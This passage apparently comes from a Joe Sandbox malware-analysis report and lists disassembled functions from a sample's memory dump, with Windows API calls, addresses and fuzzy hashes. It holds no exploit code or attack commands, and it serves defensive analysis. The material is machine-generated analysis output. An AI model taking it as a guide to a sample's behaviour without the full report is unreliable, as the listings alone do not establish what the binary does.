                                                                                                • Part of subcall function 00430626: _wcspbrk.LIBCMT ref: 00430636
                                                                                              • SendMessageW.USER32(?,00001002,00000000,?), ref: 00449477
                                                                                              • SendMessageW.USER32(?,00001060,00000000,00000004), ref: 00449507
                                                                                              • _wcslen.LIBCMT ref: 00449519
                                                                                              • _wcslen.LIBCMT ref: 00449526
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend_wcslen$_wcspbrk
                                                                                              • String ID:
                                                                                              • API String ID: 2886238975-0
                                                                                              • Opcode ID: cda1f7e16000b3d6f1552df2769fac91363fb93f1f54a3f578086acf89ecf69d
                                                                                              • Instruction ID: 7d4d19c59aaf55394df3596c947b25f6969e765268ec3300c5285dc4bbf20b28
                                                                                              • Opcode Fuzzy Hash: cda1f7e16000b3d6f1552df2769fac91363fb93f1f54a3f578086acf89ecf69d
                                                                                              • Instruction Fuzzy Hash: F7213A76B00208A6E730DF55ED81BEFB368EBA0310F10416FFF0896240E6794D55C799
                                                                                              Function 0046888B Relevance: 6.1, APIs: 4, Instructions: 80COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: __setmode$DebugOutputString_fprintf
                                                                                              • String ID:
                                                                                              • API String ID: 1792727568-0
                                                                                              • Opcode ID: 01580405df331f4a09227751ba67227c0781ee584fffe640c61a9ab7dbe43ce0
                                                                                              • Instruction ID: 94d91137fd77379d51e6296772f15362c7f2cf1f8b16651245aa9cc134f84072
                                                                                              • Opcode Fuzzy Hash: 01580405df331f4a09227751ba67227c0781ee584fffe640c61a9ab7dbe43ce0
                                                                                              • Instruction Fuzzy Hash: 5411A1B2D0020477DB107BB69C469AF7B2C8B55728F04416EF91573243E97C6A4947AB
                                                                                              Function 0047A26A Relevance: 6.1, APIs: 4, Instructions: 78COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                                                                                              • GetWindowLongW.USER32(?,000000EC), ref: 0047A2DF
                                                                                              • SetWindowLongW.USER32(?,000000EC,00000000), ref: 0047A2FA
                                                                                              • SetWindowLongW.USER32(?,000000EC,00000000), ref: 0047A312
                                                                                              • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002,?,000000EC,00000000,?,000000EC,?,00000001), ref: 0047A321
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$Long$AttributesLayered
                                                                                              • String ID:
                                                                                              • API String ID: 2169480361-0
                                                                                              • Opcode ID: 53dc7990cfeb01f65bcc542d15cac6368a2c86d5c8ae23ecc65d9f578e391a7a
                                                                                              • Instruction ID: 4b457c036b32d13d4d6aa44b7b333d7b15c6210fa1ac615a770d46c951a2b689
                                                                                              • Opcode Fuzzy Hash: 53dc7990cfeb01f65bcc542d15cac6368a2c86d5c8ae23ecc65d9f578e391a7a
                                                                                              • Instruction Fuzzy Hash: E321C3322045146BD310AB19EC45F9BB798EF81334F20862BF859E72D1C779A855C7AC
                                                                                              Function 00434CC9 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 75stringCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00434C09: lstrlenW.KERNEL32(?), ref: 00434C1C
                                                                                                • Part of subcall function 00434C09: lstrcpyW.KERNEL32(00000000,?), ref: 00434C44
                                                                                                • Part of subcall function 00434C09: lstrcmpiW.KERNEL32(00000000,00000000), ref: 00434C78
                                                                                              • lstrlenW.KERNEL32(?), ref: 00434CF6
                                                                                                • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                              • lstrcpyW.KERNEL32(00000000,?), ref: 00434D1E
                                                                                              • lstrcmpiW.KERNEL32(00000002,cdecl), ref: 00434D64
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: lstrcmpilstrcpylstrlen$_malloc
                                                                                              • String ID: cdecl
                                                                                              • API String ID: 3850814276-3896280584
                                                                                              • Opcode ID: 21c69cf6c29ea855f725dfe2a9cb2720d4b8dbea94fc3a7d57af4f6d050de3c2
                                                                                              • Instruction ID: b4b7f9d7485e9dcc41445171e378d0673d7e4b3d8a31a27b28546bfa00bfc119
                                                                                              • Opcode Fuzzy Hash: 21c69cf6c29ea855f725dfe2a9cb2720d4b8dbea94fc3a7d57af4f6d050de3c2
                                                                                              • Instruction Fuzzy Hash: 1521D276200301ABD710AF25DC45AEBB3A9FF99354F10583FF90687250EB39E945C7A9
                                                                                              Function 0046D402 Relevance: 6.1, APIs: 4, Instructions: 73networkCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 0045F645: WideCharToMultiByte.KERNEL32(00000000,00000000,5004C483,D29EE858,00000000,00000000,00000000,00000000,?,?,?,00467B75,?,00473BB8,00473BB8,?), ref: 0045F661
                                                                                              • gethostbyname.WSOCK32(?,00000000,?,?), ref: 0046D42D
                                                                                              • WSAGetLastError.WSOCK32(00000000), ref: 0046D439
                                                                                              • _memmove.LIBCMT ref: 0046D475
                                                                                              • inet_ntoa.WSOCK32(?), ref: 0046D481
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: ByteCharErrorLastMultiWide_memmovegethostbynameinet_ntoa
                                                                                              • String ID:
                                                                                              • API String ID: 2502553879-0
                                                                                              • Opcode ID: c217391507a75a633327f3eae623a7fb2dd57c89b178c2547ebfa016f7fa05d4
                                                                                              • Instruction ID: 24c3f219ec43f49587972b4c28f02db1d16d05b11a5808876a7c02c26e676da9
                                                                                              • Opcode Fuzzy Hash: c217391507a75a633327f3eae623a7fb2dd57c89b178c2547ebfa016f7fa05d4
                                                                                              • Instruction Fuzzy Hash: A7216F769001046BC700FBA6DD85C9FB7BCEF48318B10486BFC01B7241DA39EE058BA5
                                                                                              Function 00448C3C Relevance: 6.1, APIs: 4, Instructions: 72windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SendMessageW.USER32 ref: 00448C69
                                                                                              • GetWindowLongW.USER32(?,000000EC), ref: 00448C91
                                                                                              • SendMessageW.USER32(?,0000104C,00000000,?), ref: 00448CCA
                                                                                              • SendMessageW.USER32(?,0000102B,00000000,?), ref: 00448D13
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$LongWindow
                                                                                              • String ID:
                                                                                              • API String ID: 312131281-0
                                                                                              • Opcode ID: aa9ba785652a5e2d68973233cc9ee5be9ec2ae113b50a66827928a68bf1dc890
                                                                                              • Instruction ID: 9d65767971b32091eca868ce8e4b461936feaca2c152e776436a997c982fc1ac
                                                                                              • Opcode Fuzzy Hash: aa9ba785652a5e2d68973233cc9ee5be9ec2ae113b50a66827928a68bf1dc890
                                                                                              • Instruction Fuzzy Hash: 782186711193009BE3209F18DD88B9FB7E4FBD5325F140B1EF994962D0DBB58448C755
                                                                                              Function 00458A61 Relevance: 6.1, APIs: 4, Instructions: 71networkCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • select.WSOCK32(00000000,?,00000000,00000000,?), ref: 00458ABD
                                                                                              • __WSAFDIsSet.WSOCK32(00000000,00000001), ref: 00458ACF
                                                                                              • accept.WSOCK32(00000000,00000000,00000000), ref: 00458ADE
                                                                                              • WSAGetLastError.WSOCK32(00000000), ref: 00458B03
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLastacceptselect
                                                                                              • String ID:
                                                                                              • API String ID: 385091864-0
                                                                                              • Opcode ID: feb2d603c895e760471213290e220df4c8c9e23c071c6cdae6f1f3a6ceb811dc
                                                                                              • Instruction ID: 6dce411450cb473f00463c700f03c36a20fe0f69cdcaeecb298670ce0bdbd9a3
                                                                                              • Opcode Fuzzy Hash: feb2d603c895e760471213290e220df4c8c9e23c071c6cdae6f1f3a6ceb811dc
                                                                                              • Instruction Fuzzy Hash: 032192716002049FD714EF69DD45BAAB7E8EB94310F10866EF988DB380DBB4A9808B94
                                                                                              Function 004368A0 Relevance: 6.1, APIs: 4, Instructions: 69windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SendMessageW.USER32(?,000000B0,?,?), ref: 004368C2
                                                                                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004368D5
                                                                                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004368EC
                                                                                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00436904
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend
                                                                                              • String ID:
                                                                                              • API String ID: 3850602802-0
                                                                                              • Opcode ID: 236e71af2ab5509716104e28957e7b962cfbcf4ba6a1ba9531cfd5eb7baefe48
                                                                                              • Instruction ID: 15055718653181d31d708d6839b45d2b231db9ad4f5f2f8f789da6f3b04ac486
                                                                                              • Opcode Fuzzy Hash: 236e71af2ab5509716104e28957e7b962cfbcf4ba6a1ba9531cfd5eb7baefe48
                                                                                              • Instruction Fuzzy Hash: A7111275640208BFDB10DF68DC85F9AB7E8EF98750F11815AFD48DB340D6B1A9418FA0
                                                                                              Function 004301F8 Relevance: 6.1, APIs: 4, Instructions: 57windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00400000,00000000), ref: 00430242
                                                                                              • GetStockObject.GDI32(00000011), ref: 00430258
                                                                                              • SendMessageW.USER32(00000000,00000030,00000000), ref: 00430262
                                                                                              • ShowWindow.USER32(00000000,00000000), ref: 0043027D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$CreateMessageObjectSendShowStock
                                                                                              • String ID:
                                                                                              • API String ID: 1358664141-0
                                                                                              • Opcode ID: ad6f98361a8c00dabf9f53bae98ff29a7c8ddeda354316ac2ad0817ad8c48d31
                                                                                              • Instruction ID: 87b955557270564ac2446a75def7de819d41fbc8528d619d8765837e6f615a12
                                                                                              • Opcode Fuzzy Hash: ad6f98361a8c00dabf9f53bae98ff29a7c8ddeda354316ac2ad0817ad8c48d31
                                                                                              • Instruction Fuzzy Hash: BD115172600504ABD755CF99DC59FDBB769AF8DB10F148319BA08932A0D774EC41CBA8
                                                                                              Function 00443C87 Relevance: 6.1, APIs: 4, Instructions: 57synchronizationthreadwindowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetCurrentThreadId.KERNEL32 ref: 00443CA6
                                                                                              • MessageBoxW.USER32(?,?,?,?), ref: 00443CDC
                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00443CF2
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00443CF9
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                                              • String ID:
                                                                                              • API String ID: 2880819207-0
                                                                                              • Opcode ID: 229c650092e78496607f1920186e21dd31435e443465a7f1ce6d350790d3a3c2
                                                                                              • Instruction ID: e6f874550e00e623fb34483f391c95d80eb5f5bc6ce026338450b862d26ff76c
                                                                                              • Opcode Fuzzy Hash: 229c650092e78496607f1920186e21dd31435e443465a7f1ce6d350790d3a3c2
                                                                                              • Instruction Fuzzy Hash: 48112572804114ABD710CF68ED08ADF3FACDF99721F10026AFC0493381D6B09A1083E9
                                                                                              Function 00430B87 Relevance: 6.1, APIs: 4, Instructions: 53COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetWindowRect.USER32(?,?), ref: 00430BA2
                                                                                              • ScreenToClient.USER32(?,?), ref: 00430BC1
                                                                                              • ScreenToClient.USER32(?,?), ref: 00430BE2
                                                                                              • InvalidateRect.USER32(?,?,?,?,?), ref: 00430BFB
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: ClientRectScreen$InvalidateWindow
                                                                                              • String ID:
                                                                                              • API String ID: 357397906-0
                                                                                              • Opcode ID: ae0d0d06dcef6ed583fb9704f0ef5e529f18a40629d10526419e4a4e3dd97404
                                                                                              • Instruction ID: ace0395ef2957b48f9d17fb026497d1a369c9e3160b5fb36bd9a4683c33ce433
                                                                                              • Opcode Fuzzy Hash: ae0d0d06dcef6ed583fb9704f0ef5e529f18a40629d10526419e4a4e3dd97404
                                                                                              • Instruction Fuzzy Hash: 561174B9D00209AFCB14DF98C8849AEFBB9FF98310F10855EE855A3304D774AA41CFA0
                                                                                              Function 00433908 Relevance: 6.0, APIs: 4, Instructions: 50COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __wsplitpath.LIBCMT ref: 0043392E
                                                                                                • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                                                              • __wsplitpath.LIBCMT ref: 00433950
                                                                                              • __wcsicoll.LIBCMT ref: 00433974
                                                                                              • __wcsicoll.LIBCMT ref: 0043398A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: __wcsicoll__wsplitpath$__wsplitpath_helper
                                                                                              • String ID:
                                                                                              • API String ID: 1187119602-0
                                                                                              • Opcode ID: 68e3b32a9464b28f7030a0941ccdc911afb24839bc46986435f1213a6174ca5b
                                                                                              • Instruction ID: cee1712abd0eced5cc96ea34974ed2185298bb9760f8079e64959bf12be8e646
                                                                                              • Opcode Fuzzy Hash: 68e3b32a9464b28f7030a0941ccdc911afb24839bc46986435f1213a6174ca5b
                                                                                              • Instruction Fuzzy Hash: 650121B2C0011DAACB14DF95DC41DEEB37CAB48314F04869EA60956040EA759BD88FE4
                                                                                              Function 00434963 Relevance: 6.0, APIs: 4, Instructions: 46COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcslen$_malloc_wcscat_wcscpy
                                                                                              • String ID:
                                                                                              • API String ID: 1597257046-0
                                                                                              • Opcode ID: 3c6fc8acff7e2f2e7aee9de07fb73a2c390eddda5e8305f0b40f95221864db4e
                                                                                              • Instruction ID: 3a313011a65081929a098f39c1c59cfda42f2cbb237f2651e2b7e76e77134880
                                                                                              • Opcode Fuzzy Hash: 3c6fc8acff7e2f2e7aee9de07fb73a2c390eddda5e8305f0b40f95221864db4e
                                                                                              • Instruction Fuzzy Hash: 40016271200604BFC714EB66D885EABF3EDEFC9354B00852EFA168B651DB39E841C764
                                                                                              Function 0041F584 Relevance: 6.0, APIs: 4, Instructions: 41COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetEnvironmentStringsW.KERNEL32(00000000,00416513), ref: 0041F587
                                                                                              • __malloc_crt.LIBCMT ref: 0041F5B6
                                                                                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0041F5C3
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: EnvironmentStrings$Free__malloc_crt
                                                                                              • String ID:
                                                                                              • API String ID: 237123855-0
                                                                                              • Opcode ID: 07fe547740a9b68c76983245d8bba65816afc234b1fe2171e551a8e4c438482c
                                                                                              • Instruction ID: d6a98a4ee5591e13f27bf8bfb2f7094eea62761642478a01f8f101a8eeefaa10
